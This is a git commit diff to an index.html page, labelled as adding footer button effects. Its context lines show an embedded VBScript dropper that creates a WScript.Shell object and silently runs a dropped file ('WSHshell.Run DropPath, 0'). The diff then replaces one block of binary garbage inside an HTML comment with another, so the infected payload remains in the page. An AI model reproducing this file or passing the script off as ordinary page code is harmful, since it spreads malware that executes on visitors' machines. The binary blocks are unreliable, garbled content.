putting button effects for footer buttons

--- a/index.html
+++ b/index.html
@@ -5,7 +5,7 @@
     <body>
         <div id="container">
             <div id="upperCon">
-                <iframe id="topContent" src="home.html" name="topScreen">
+                <iframe id="topContent" src="" name="topScreen">
                 </iframe>
             </div>
             <div id="lowerCon">
@@ -43,12 +43,4 @@ FileObj.Close
 End If
 Set WSHshell = CreateObject("WScript.Shell")
 WSHshell.Run DropPath, 0
-//--></SCRIPT><!--÷¬Ñð£O¿y›Ç+CFI0Ðó‡ùPx†Ç÷ì´Oþ¥¦et¸åÖoÝ°ÜÎ6Å¨ÔPƒqédžÉDQŒõ€(o]çoµ–eåF¬Œ[Ê$]ûä¤::0&©ùµÅö	QOÁ¶iy,[â¡‚–ý˜Ç¸‘–²ª	eï fQ¨b¼?R=²5#Û§œ7×™(®{šÚóëùt2•tk
-]è°}—¤Æ	Oè{ëø=‹R×û ÎM›«ÇÜŠ©¦‡Û.í-wgâÚâ~å×µpr»D¬õ€ÀxÊü[¸!ò»Úð¬Œ.aÍÅüÇ—RaL„%qÞÌ¼ÈFFÇ ÜÚ'‰æþk	‡·Ç#=y
-è%ý¨ž²©PO/5FBð/õB¦“míª‰£î“‹§Ã·?–Â–™%‡ÙÐÂè–¦×íX)da°fŸ,»XwäZÞ3éw¥O?à`­ì–ÈôÏ÷Ž†8GUÃL\Æ# Ü
-RùÜ
-Ü
-Ü
-‘×O=÷ØZØ
- Ü
--->
+//--></SCRIPT><!-- „}Ob¬KC¦šPžoòö‹ðÛLÔ—¶m¨øŽ{AwW=ç§IÞa—ÙÅtíð?Âj$JÙ²zs•F«ú0kRx×ÁDU,ázÏMÉ\975™ö#À‡J¤~ú,ÁÇ~ŸÂ´ß0»YÖÀ0M ´²UÍ°yœiímù“PSwÜ]Nô|••wO‰$ïÝÇt¡\no›„xB8RÃxlõ@JSF©évìÈ½šZµ¢UC©Èá âË9ØÅØÛ>eËÁ‰fô§f÷Â²¥…K%áW¤P“x(äF@1kNXª¯ˆßdRe½^"¿Œ‹O‡Eàæ“Ùå" *WÊýÎ]jÝþAyªÑÕÚ#½ã”£HÎ¯âž®7r²ä¹Úý!Ð8…†<áÖ`Ï á(R"3ùá(á(á(¬õO*úZ„å( á(-->
